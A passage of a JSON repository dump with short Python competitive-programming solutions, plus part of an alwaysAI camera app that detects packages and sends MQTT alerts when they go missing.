false, "is_vendor": false, "language": "Python", "length_bytes": 93, "license_type": "no_license", "max_line_length": 41, "num_lines": 3, "path": "/FLOW002.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range (int(input())):\n a,b=[int(i) for i in input().split()]\n print(int(a%b))\n" }, { "alpha_fraction": 0.40519481897354126, "alphanum_fraction": 0.4389610290527344, "avg_line_length": 21.647058486938477, "blob_id": "66e081844a171d1ed7b26c61ad90c35dde5398c4", "content_id": "9f794645c2a11a9ae660516daa1d1b786e8753fa", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 385, "license_type": "no_license", "max_line_length": 45, "num_lines": 17, "path": "/ENTEXAM.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n n,k,e,m=[int(i) for i in input().split()]\n a=[0]*(n)\n b=[0]*e\n for i in range(n):\n b[e-1]=0\n b=[int(i) for i in input().split()]\n a[i]=sum(b)\n p=a[n-1]\n a.sort(reverse=True)\n q=a[k-1]\n if(q-p+1<=m and q-p+1>0):\n print(q-p+1)\n elif(q-p+1<=0):\n print(\"0\")\n else:\n print(\"Impossible\")\n" }, { "alpha_fraction": 0.3041749596595764, "alphanum_fraction": 0.32405567169189453, "avg_line_length": 24.149999618530273, "blob_id": "eb786fa5138b1e3a104b63690490fcb972dd50ac", "content_id": "a0fb0b9bd48e9d2b13aaa4aec132974509934776", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 503, "license_type": "no_license", "max_line_length": 43, "num_lines": 20, "path": "/VALIDSTK.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n n = int(input())\n arr = [int(i) for i in input().split()]\n if len(arr) == n:\n count = 0\n k = 0\n i = 0\n for i in range(len(arr)):\n if arr[i] == 1:\n count+=1\n elif arr[i] == 0:\n if count == 0:\n k = 1\n break\n else:\n count-=1\n if k == 1:\n print(\"Invalid\")\n else:\n print(\"Valid\")\n" }, { "alpha_fraction": 0.4356846511363983, "alphanum_fraction": 0.43983402848243713, "avg_line_length": 20.909090042114258, "blob_id": "23284d28b6f8782107a669fcbf6ab9e9847a8942", "content_id": "2e1fabddc47f85cc55576c304ad3954e36bbcc69", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 241, "license_type": "no_license", "max_line_length": 41, "num_lines": 11, "path": "/PRICECON.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n n,k=[int(i) for i in input().split()]\n p=[int(i) for i in input().split()]\n rev=sum(p)\n amt=0\n for i in p:\n if(i>k):\n amt+=k\n else:\n amt+=i\n print(rev-amt)\n" }, { "alpha_fraction": 0.3614457845687866, "alphanum_fraction": 0.3734939694404602, "avg_line_length": 19.75, "blob_id": "923b647fc1f7cd0262583e1006a8242a1f3ded05", "content_id": "f8b33e685a9f091b2215215dc0626967a040aa52", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 249, "license_type": "no_license", "max_line_length": 55, "num_lines": 12, "path": "/TWOSTR.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n x=input()\n y=input()\n p=-1\n for i in range(len(x)):\n if((x[i]!=y[i]) and (x[i]!='?' and y[i]!='?')):\n p=0\n break\n if(p==-1):\n print(\"Yes\")\n else:\n print(\"No\")\n" }, { "alpha_fraction": 0.28260868787765503, "alphanum_fraction": 0.33695653080940247, "avg_line_length": 18.714284896850586, "blob_id": "40633a4426025e0951ff56b0ef3b1f18ee0a8a78", "content_id": "8d078ab400b69915304654efd090f78154bf92bb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 276, "license_type": "no_license", "max_line_length": 32, "num_lines": 14, "path": "/LONGSEQ.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n n=input()\n a=[0,0]\n for i in n:\n if(i=='0'):\n a[0]+=1\n else:\n a[1]+=1\n if(a[0]>=2 and a[1]>=2):\n break\n if(a[0]==1 or a[1]==1):\n print(\"Yes\")\n else:\n print(\"No\")\n" }, { "alpha_fraction": 0.36082473397254944, "alphanum_fraction": 0.39175257086753845, "avg_line_length": 19.55555534362793, "blob_id": "9b93ccf1ea9c6bf798dd5a0f6e05d8984519cc02", "content_id": "840b85260d551b8442ea66092bdf0e789a42fe92", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 194, "license_type": "no_license", "max_line_length": 41, "num_lines": 9, "path": "/CHEFWARS.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n h,p=[int(i) for i in input().split()]\n while(p>0 and h>0):\n h-=p\n p//=2\n if(h<=0):\n print(\"1\")\n else:\n print(\"0\")\n \n" }, { "alpha_fraction": 0.2931937277317047, "alphanum_fraction": 0.3333333432674408, "avg_line_length": 22.875, "blob_id": "9988bb9c4150c84918280eddecee301ad07338fc", "content_id": "bf570da509a17cf7b5fe479195ece1d476800675", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 573, "license_type": "no_license", "max_line_length": 56, "num_lines": 24, "path": "/GIFTSRC.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n n=int(input())\n s=input()\n x,y=0,0\n for i in range(1,n,1):\n if(s[i]=='L' and s[i-1]!='L' and s[i-1]!='R'):\n x-=1\n elif(s[i]=='R' and s[i-1]!='L' and s[i-1]!='R'):\n x+=1\n elif(s[i]=='U' and s[i-1]!='U' and s[i-1]!='D'):\n y+=1\n elif(s[i]=='D' and s[i-1]!='U' and s[i-1]!='D'):\n y-=1\n else:\n continue\n if(s[0]=='L'):\n x-=1\n elif(s[0]=='R'):\n x+=1\n elif(s[0]=='U'):\n y+=1\n else:\n y-=1\n print(x,\" \",y)\n" }, { "alpha_fraction": 0.3473389446735382, "alphanum_fraction": 0.36974790692329407, "avg_line_length": 35.33333206176758, "blob_id": "d242e136ccf1dc94f57374beb8e682be3f4a19a7", "content_id": "b1ceeea36e1d2f48497864526d83b3883f6d9c91", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 357, "license_type": "no_license", "max_line_length": 99, "num_lines": 9, "path": "/CV.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n n=int(input())\n s=input()\n flag=0\n for i in range(n):\n if ((s[i]!='a' and s[i]!='e' and s[i]!='i' and s[i]!='o' and s[i]!='u') and i <= len(s)-2):\n if (s[i+1]=='a' or s[i+1]=='e' or s[i+1]=='i' or s[i+1]=='o' or s[i+1]=='u'):\n flag+=1\n print(flag) \n \n \n" }, { "alpha_fraction": 0.37003058195114136, "alphanum_fraction": 0.40366971492767334, "avg_line_length": 20.799999237060547, "blob_id": "48de3a31c5074fdb548aa5d2356969e68ef5f696", "content_id": "3435e2a1780bca4cda6f2c17b8b30988deeb16f8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 327, "license_type": "no_license", "max_line_length": 39, "num_lines": 15, "path": "/CENS20D.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n n=int(input())\n a=[int(i) for i in input().split()]\n b=[]\n c=0\n for i in range(1,n+1):\n for j in range(i+1,n+1):\n b.append([i,j])\n \n for i in range(len(b)):\n x=b[i][0]\n y=b[i][1]\n if a[x-1]&a[y-1]==a[x-1]:\n c=c+1\n print(c)\n" }, { "alpha_fraction": 0.4292929172515869, "alphanum_fraction": 0.43939393758773804, "avg_line_length": 23.75, "blob_id": "185bdcd4e924109d865fec17094e906fff7cc661", "content_id": "e772dded983369327c27abaf25005aca2911c5b6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 198, "license_type": "no_license", "max_line_length": 50, "num_lines": 8, "path": "/ICM2008.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n a, b, c, d = (int(i) for i in input().split())\n m = abs(a-b)\n n = abs(c-d)\n if m==n or n!=0 and m%n==0:\n print('YES')\n else:\n print('NO')\n" }, { "alpha_fraction": 0.38314175605773926, "alphanum_fraction": 0.40229883790016174, "avg_line_length": 19.076923370361328, "blob_id": "916b1223605591c445bef3f270421c69c6350e71", "content_id": "c1b7c6e584dc1fdeb084aa261b109dfc161baa0c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 261, "license_type": "no_license", "max_line_length": 39, "num_lines": 13, "path": "/CEQUAL.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n n=int(input())\n a=[int(i) for i in input().split()]\n a.sort()\n k=0\n for i in range(n-1):\n if(a[i]==a[i+1]):\n k+=1\n break\n if(k==1):\n print(\"Yes\")\n else:\n print(\"No\")\n" }, { "alpha_fraction": 0.4359999895095825, "alphanum_fraction": 0.4359999895095825, "avg_line_length": 23.200000762939453, "blob_id": "5e467335e1d43c4eb450c5604987e2744806bf15", "content_id": "df2ad5f1406f10180180f7eb4ea3195da16780c2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 250, "license_type": "no_license", "max_line_length": 45, "num_lines": 10, "path": "/RECTANGL.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for i in range(int(input())):\n a,b,c,d=[int(i) for i in input().split()]\n if(a==b and c==d):\n print(\"YES\")\n elif(a==c and b==d):\n print(\"YES\")\n elif(a==d and b==c):\n print(\"YES\")\n else:\n print(\"NO\")\n \n" }, { "alpha_fraction": 0.4205128252506256, "alphanum_fraction": 0.47179487347602844, "avg_line_length": 20.66666603088379, "blob_id": "1fa6ef18b4776e1ccc077e3aa9f631c1975af5ab", "content_id": "9418c5efb76941aedaeb8cd1bc8e5192b4a172b9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 195, "license_type": "no_license", "max_line_length": 39, "num_lines": 9, "path": "/PCJ18C.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "import math\nt=int(input())\nwhile(t!=0):\n n,a,k=map(int,input().split())\n q=n*(n-1)\n p=(((n-2)*360-(2*a*n))*(k-1))+(a*q)\n x=math.gcd(p,n*(n-1))\n print(int(p/x), int(q/x))\n t=t-1\n" }, { "alpha_fraction": 0.34560906887054443, "alphanum_fraction": 0.3597733676433563, "avg_line_length": 22.53333282470703, "blob_id": "20818c6a7fa7d8087892ee0449f1b38bfd7f02c6", "content_id": "4a538c440c904937e0acc6685622c53332bbcb7b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 353, "license_type": "no_license", "max_line_length": 42, "num_lines": 15, "path": "/CHEFARRP.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n n = int(input())\n a = [int(i) for i in input().split()]\n count = 0\n for i in range(n):\n for j in range(i+1, n+1):\n sub = a[i:j]\n s = sum(sub)\n p = 1\n for k in sub:\n p*= k\n if s == p:\n count += 1\n \n print(count)\n" }, { "alpha_fraction": 0.2953367829322815, "alphanum_fraction": 0.3575129508972168, "avg_line_length": 18.299999237060547, "blob_id": "6518415437d34ec80e19cb14d7dfa20ebe2870e6", "content_id": "5d03ee0e413d29a8fedc9396255c074ee35d0ec6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 193, "license_type": "no_license", "max_line_length": 29, "num_lines": 10, "path": "/TWOVSTEN.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n x=int(input())\n if(x%5==0 or x%10==0):\n k=0\n while(x%10!=0):\n x*=2\n k+=1\n print(k)\n else:\n print(\"-1\")\n" }, { "alpha_fraction": 0.3789868652820587, "alphanum_fraction": 0.399624764919281, "avg_line_length": 21.20833396911621, "blob_id": "d5c51e1743c6e57b2c08c75faeeffc674493b40d", "content_id": "a3b5d43e094ea20549dfa2880387888566613f01", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 533, "license_type": "no_license", "max_line_length": 43, "num_lines": 24, "path": "/ZUBREACH.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for t in range(int(input())):\n m,n=[int(i) for i in input().split()]\n rx,ry=[int(i) for i in input().split()]\n l=int(input())\n s=input()\n l,u,d,r=0,0,0,0\n for i in s:\n if(i=='L'):\n l+=1\n elif(i=='U'):\n u+=1\n elif(i=='R'):\n r+=1\n else:\n d+=1\n x=r-l\n y=u-d\n print(\"Case\",t+1,end=\"\")\n if(x==rx and y==ry):\n print(\": REACHED\")\n elif(x<0 or x>m or y<0 or y>n):\n print(\": DANGER\")\n else:\n print(\": SOMEWHERE\")\n" }, { "alpha_fraction": 0.43103447556495667, "alphanum_fraction": 0.4482758641242981, "avg_line_length": 28, "blob_id": "f88614030ec3f8391cf15b4eec14d13dd18a78e3", "content_id": "ba63507addc5c025e0f1319ec54fe374ebfaba98", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 174, "license_type": "no_license", "max_line_length": 43, "num_lines": 6, "path": "/THREEFR.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n x,y,z=[int(i) for i in input().split()]\n if x+y-z==0 or x+z-y==0 or z+y-x==0:\n print('yes')\n else:\n print('no')\n" }, { "alpha_fraction": 0.3968871533870697, "alphanum_fraction": 0.42023345828056335, "avg_line_length": 19.08333396911621, "blob_id": "cba9beea1af7525a57866b94da2cf25479b5a93f", "content_id": "dc0c042a0aef7009a5cc2f0e1e60cd5e7ca901be", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 257, "license_type": "no_license", "max_line_length": 42, "num_lines": 12, "path": "/PRB01.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "import math\nfor _ in range(int(input())):\n n=int(input())\n flag=0\n for i in range(2,int(math.sqrt(n))+1):\n if(n%i==0):\n flag+=1\n break\n if(flag==0):\n print(\"yes\")\n else:\n print(\"no\")\n \n" }, { "alpha_fraction": 0.3858267664909363, "alphanum_fraction": 0.4094488322734833, "avg_line_length": 20.399999618530273, "blob_id": "73f61b4e6280547b7feb7d0f644b4f41058de6f7", "content_id": "0d1743395fe332b5b0c53a8e00c61f4832e40338", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 127, "license_type": "no_license", "max_line_length": 37, "num_lines": 5, "path": "/FCTRL2.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n x=1\n for i in range(1,int(input())+1):\n x*=i\n print(int(x))\n \n" }, { "alpha_fraction": 0.38866397738456726, "alphanum_fraction": 0.4736842215061188, "avg_line_length": 19.08333396911621, "blob_id": "8a2d8cc70a7cbd0fa995a98aef4f5922b8c30e82", "content_id": "8f6636b8b4c2030ab1cb589c76263c1db26b7347", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 247, "license_type": "no_license", "max_line_length": 52, "num_lines": 12, "path": "/CHEFRUN.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n x1,x2,x3,v1,v2=[int(i) for i in input().split()]\n d1=x3-x1\n d2=x2-x3\n t1=d1/v1\n t2=d2/v2\n if t1<t2:\n print(\"Chef\")\n elif t1>t2:\n print(\"Kefa\")\n else:\n print(\"Draw\")\n \n" }, { "alpha_fraction": 0.49597856402397156, "alphanum_fraction": 0.49865952134132385, "avg_line_length": 23.866666793823242, "blob_id": "751db57746385147eee52a86d1db3c3917e17bfd", "content_id": "b3510d0944171039f27f7c1ac886ac5c6baf704c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 373, "license_type": "no_license", "max_line_length": 39, "num_lines": 15, "path": "/MODEFREQ.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n n=[int(i) for i in input().split()]\n a=[int(i) for i in input().split()]\n a.sort()\n b=list(dict.fromkeys(a))\n c=[0]*len(b)\n for i in range(len(b)):\n c[i]=a.count(b[i])\n c.sort()\n d=list(dict.fromkeys(c))\n e=[]\n for i in range(len(d)):\n e.append(c.count(d[i]))\n m=e.index(max(e))\n print(d[m])\n" }, { "alpha_fraction": 0.460317462682724, "alphanum_fraction": 0.5661375522613525, "avg_line_length": 26, "blob_id": "ddb353f17514da72bda41e3cf0f39c844317aaf4", "content_id": "260fd99d70680f91256686e92a12b19d1704ef72", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 189, "license_type": "no_license", "max_line_length": 47, "num_lines": 7, "path": "/SNCKYEAR.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "year_conducted = [2010, 2015, 2016, 2017, 2019]\nfor _ in range(int(input())):\n n = int(input())\n if n in year_conducted:\n print(\"HOSTED\")\n else:\n print(\"NOT HOSTED\")\n" }, { "alpha_fraction": 0.3910256326198578, "alphanum_fraction": 0.4743589758872986, "avg_line_length": 13.181818008422852, "blob_id": "4ce8d382ea0f1fc0620e7035a06e62d3eeb4570c", "content_id": "1f08869f425bb4834a4d559a22156a931dee78e5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 156, "license_type": "no_license", "max_line_length": 29, "num_lines": 11, "path": "/REDONE.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "m=10**9+7\nz=10**6+1\nl=[0]*z\nl[1]=1\nx=1\nfor i in range(2,z):\n x=(x+i+(x*i))%m\n l[i]=x\nfor _ in range(int(input())):\n n=int(input())\n print(l[n])\n" }, { "alpha_fraction": 0.36486485600471497, "alphanum_fraction": 0.36936935782432556, "avg_line_length": 16.75, "blob_id": "83df5b568ca4668b10921925589fe33a964bbc45", "content_id": "faca549cc4b5dc8514606db320fcb3ea9b996ee6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 222, "license_type": "no_license", "max_line_length": 29, "num_lines": 12, "path": "/ALPHABET.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "s=input()\nfor t in range(int(input())):\n a=input()\n x=-1\n for i in a:\n if i in s:\n continue \n else:\n print(\"No\")\n break\n else:\n print(\"Yes\")\n \n" }, { "alpha_fraction": 0.2781065106391907, "alphanum_fraction": 0.3254437744617462, "avg_line_length": 20.125, "blob_id": "82b24d4e97c437bea27db0c2a93f3b57a56816a1", "content_id": "f0395fa81ff9442fda764abf4a38383ba49de5e6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 338, "license_type": "no_license", "max_line_length": 41, "num_lines": 16, "path": "/PRFXGD.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n s=input()\n k,x=[int(i) for i in input().split()]\n l=[0]*26\n p=0\n for i in s:\n l[ord(i)-97]+=1\n if (l[ord(i)-97]>x):\n if(k>0):\n l[ord(i)-97]-=1\n k-=1\n p-=1\n else:\n break;\n p+=1\n print(p)\n" }, { "alpha_fraction": 0.42016807198524475, "alphanum_fraction": 0.48739495873451233, "avg_line_length": 16, "blob_id": "e44f97fce6747c6a4975ba7c21ee5d9a97b47ada", "content_id": "f90bd0da78689ec017cc071beda6b714f6a0efe0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 119, "license_type": "no_license", "max_line_length": 27, "num_lines": 7, "path": "/HS08TEST.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "a,b=input().split()\na=int(a)\nb=float(b)\nif((a+0.5)>b or a%5!=0):\n print(\"%.2f\"%b)\nelse:\n print(\"%.2f\"%(b-a-0.5))\n" }, { "alpha_fraction": 0.4628571569919586, "alphanum_fraction": 0.46857142448425293, "avg_line_length": 27.33333396911621, "blob_id": "08d9d669ccf12efaca1e9917a44506ec10bfdfdb", "content_id": "27882f077e26386cb1b53c1290f7978ca3e70483", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 175, "license_type": "no_license", "max_line_length": 53, "num_lines": 6, "path": "/CHSERVE.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n chef, cook, k = [int(i) for i in input().split()]\n if (chef+cook) % (2*k) < k:\n print(\"CHEF\")\n else:\n print(\"COOK\")\n \n" }, { "alpha_fraction": 0.5244755148887634, "alphanum_fraction": 0.5524475574493408, "avg_line_length": 22.83333396911621, "blob_id": "f80a1ae1e6c649368ed54f84a0f559c2c10fe0cd", "content_id": "418f5aa2f6199b9bc5025d79d14ecc7304fd85dd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 143, "license_type": "no_license", "max_line_length": 42, "num_lines": 6, "path": "/QUADROOT.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "import math\na=int(input())\nb=int(input())\nc=int(input())\nprint((-b+math.sqrt((b*b)-(4*a*c)))/(2*a))\nprint((-b-math.sqrt((b*b)-(4*a*c)))/(2*a))\n" }, { "alpha_fraction": 0.4909090995788574, "alphanum_fraction": 0.49696969985961914, "avg_line_length": 11.538461685180664, "blob_id": "c827c9ce7a375e8036f54e8f81d0d8a583de8a34", "content_id": "be73ca989984b4228ebe4bedda332bdf1ad58e3a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 165, "license_type": "no_license", "max_line_length": 17, "num_lines": 13, "path": "/AREAPERI.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "l=int(input())\nb=int(input())\na=l*b\np=2*(l+b)\nif(a>p):\n print(\"Area\")\n print(a)\nelif(p>a):\n print(\"Peri\")\n print(p)\nelse:\n print(\"Eq\")\n print(a)\n \n" }, { "alpha_fraction": 0.39747634530067444, "alphanum_fraction": 0.42902207374572754, "avg_line_length": 23, "blob_id": "f1ed8ae82e0a45502c8dfcabefcdc36cd35b65bd", "content_id": "12477c50be7396da03e424e21b688dbe48b66759", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 317, "license_type": "no_license", "max_line_length": 55, "num_lines": 13, "path": "/ISITCAKE.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n times = []\n for _ in range(10):\n times.append([int(i) for i in input().split()])\n count = 0\n for i in range(10):\n for j in times[i]:\n if j <= 30:\n count += 1\n if count >= 60:\n print(\"yes\")\n else:\n print(\"no\")\n \n" }, { "alpha_fraction": 0.379084974527359, "alphanum_fraction": 0.4313725531101227, "avg_line_length": 16, "blob_id": "e60e663ee2ef349ad8111efd0d9a8be109d68464", "content_id": "8691fcf09966a729ada9d33ce7ab5f948a478d34", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 153, "license_type": "no_license", "max_line_length": 29, "num_lines": 9, "path": "/FLOW004.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n n=int(input())\n s=int(n%10)\n t=0\n while (n>0):\n t=int(n%10)\n n=int(n/10)\n s=s+t\n print(s)\n" }, { "alpha_fraction": 0.4093567132949829, "alphanum_fraction": 0.429824560880661, "avg_line_length": 21.799999237060547, "blob_id": "7c157050e5a991d89df5721c9e740b243f249ace", "content_id": "f7d488d142601f0ff69d84a1436489b0c082e6cf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 342, "license_type": "no_license", "max_line_length": 41, "num_lines": 15, "path": "/POTATOES.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "def isprime(n):\n if n==1:\n return False\n else:\n for i in range(2,(n//2)+1):\n if n%i == 0:\n return False\n else:\n return True\nfor _ in range(int(input())):\n x,y=[int(i) for i in input().split()]\n s= x+y+1 \n while (isprime(s)==False):\n s+=1 \n print(s-(x+y))\n" } ]
141
abhatikar/package-monitor
https://github.com/abhatikar/package-monitor
ad87f0bd7b4e0742563391e7a9498a64c7087b7e
e04648548bab7e501620e400e62e0ae064a003da
26eb93e0b2b3f401915f40f867d688406fdd4950
refs/heads/main
2023-03-29T21:19:14.045147
2021-04-05T15:06:55
2021-04-05T15:06:55
325,638,626
1
1
Apache-2.0
2020-12-30T20:07:59
2021-04-02T13:33:38
2021-04-05T15:06:55
Python
[ { "alpha_fraction": 0.5791966915130615, "alphanum_fraction": 0.5808444619178772, "avg_line_length": 36.9296875, "blob_id": "08e45e3b492a345bd2264cb999bf1e3d492d84cb", "content_id": "d1309b12ca9fbe335516505bd3be1c175acd3df5", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4855, "license_type": "permissive", "max_line_length": 108, "num_lines": 128, "path": "/package_detection/package_monitor.py", "repo_name": "abhatikar/package-monitor", "src_encoding": "UTF-8", "text": "from copy import deepcopy\nimport time\nimport paho.mqtt.client as mqtt\n\nclass PackageMonitor:\n def __init__(self):\n \"\"\"This class enables a state machine system for package detection.\n \"\"\"\n self.previous_packages = {}\n self.current_packages = {}\n self.packages_added = []\n self.packages_removed = []\n self.pending = False\n self.timer = time.time()\n self.rois = {}\n self.mqtt_client = mqtt.Client(\"Package_Monitor\")\n self.mqtt_client.connect(\"broker.hivemq.com\")\n self.mqtt_client.loop_start()\n\n def set_packages(self, objects):\n \"\"\"Sets previous packages to the current packages and\n sets the current packages to the input objects.\n\n Args:\n objects (dictionary): the object ID is the key \n and the ObjectDetectionPrediction as the value.\n \"\"\"\n self.previous_packages = deepcopy(self.current_packages)\n \n self.current_packages = deepcopy(objects)\n self.check_for_updates()\n\n def get_count(self):\n \"\"\"Returns the number of current packages.\n\n Returns:\n int: Number of items in the current_packages dictionary.\n \"\"\"\n return len(self.current_packages)\n\n def get_current_packages(self):\n \"\"\"Returns current package dictionary.\n\n Returns:\n dictionary: the object ID is the key \n and the ObjectDetectionPrediction as the value.\n \"\"\"\n return self.current_packages\n\n def action(self):\n \"\"\"Checks the state of the system. Replace returned\n string with desired action items for customized system.\n\n Returns:\n string: A string description of the state.\n \"\"\"\n action = \"{}: \".format(time.asctime())\n if self.pending:\n if time.time() - self.timer >= 5:\n # check for old ROIs \n if not self.check_overlap():\n # if packages have been removed, send alert\n action += \"Send Alert: packages removed.\\n\"\n print(action) #printing this for demo purposes\n self.mqtt_client.publish(\"alwaysai/package-alert\", \"Alert: packages removed\")\n else:\n action += \"False alarm, packages are there.\\n\"\n print(action) #printing this for demo purposes\n self.mqtt_client.publish(\"alwaysai/package-alert\", \"False alarm: packages are there\")\n self.pending = False \n self.rois = deepcopy(self.current_packages)\n else:\n return action \n\n if len(self.packages_removed) > 0:\n self.pending = True\n self.rois = deepcopy(self.previous_packages)\n self.timer = time.time()\n action += \"Packages may have been removed\\n\"\n print(action) #printing this for demo purposes\n self.mqtt_client.publish(\"alwaysai/package-alert\", \"Packages may have been removed\")\n\n if len(self.packages_added) > 0:\n action += \"More packages have arrived!\\n\"\n print(action) #printing this for demo purposes\n self.mqtt_client.publish(\"alwaysai/package-alert\", \"More packages have arrived!\")\n\n if len(self.packages_removed) == 0 and len(self.packages_added) == 0:\n action += \"Nothing new here, waiting for packages. Package count is {}\".format(self.get_count())\n\n return action\n\n def check_overlap(self):\n \"\"\"Checks if new predictions match the last non-empty\n bounding boxes sufficiently. Helps avoid false alerts.\n\n Returns:\n boolean: True if all previous boxes have sufficient current overlap.\n \"\"\"\n rois = [prediction.box for prediction in self.rois.values()]\n predictions = [prediction.box for prediction in self.current_packages.values()]\n print(\"roi length {}\".format(len(rois)))\n print(\"predictions length {}\".format(len(predictions)))\n for roi in rois:\n match = False\n for pred in predictions:\n if pred.compute_overlap(roi) > 0.9:\n match = True\n if not match:\n return False\n\n return True\n\n def check_for_updates(self):\n \"\"\"Updates state for new and missing packages.\n \"\"\"\n self.packages_added = list(self.current_packages.keys() \n - self.previous_packages.keys())\n self.packages_removed = list(self.previous_packages.keys() \n - self.current_packages.keys())\n \n def package_is_detected(self):\n \"\"\"Gives current count of packages\n\n Returns:\n int: number of packages detected\n \"\"\"\n return len(self.current_packages) > 0\n" }, { "alpha_fraction": 0.5207203030586243, "alphanum_fraction": 0.5261445045471191, "avg_line_length": 37.09090805053711, "blob_id": "1c8d2200c8c321a3d4dfcbc199dcec7e1636df8c", "content_id": "81a99d3ad75d360f2a32b7b65136c362f0dcfa47", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4609, "license_type": "permissive", "max_line_length": 95, "num_lines": 121, "path": "/package_detection/app.py", "repo_name": "abhatikar/package-monitor", "src_encoding": "UTF-8", "text": "import time\nimport edgeiq\nimport numpy\nfrom package_monitor import PackageMonitor\nimport os\n\"\"\"\nMonitor an area for packages and people and respond when packages have\nbeen removed from the area.\n\"\"\"\n\ndef main():\n\n cam_type = os.environ.get('OPENNCC_CAM')\n print(cam_type)\n model_name = None\n if cam_type is None:\n model_name = \"abhatikar/package_detector\"\n package_detector = edgeiq.ObjectDetection(model_name)\n cam_type = os.environ.get('NCS2_CAM')\n if cam_type is None:\n cam_type = 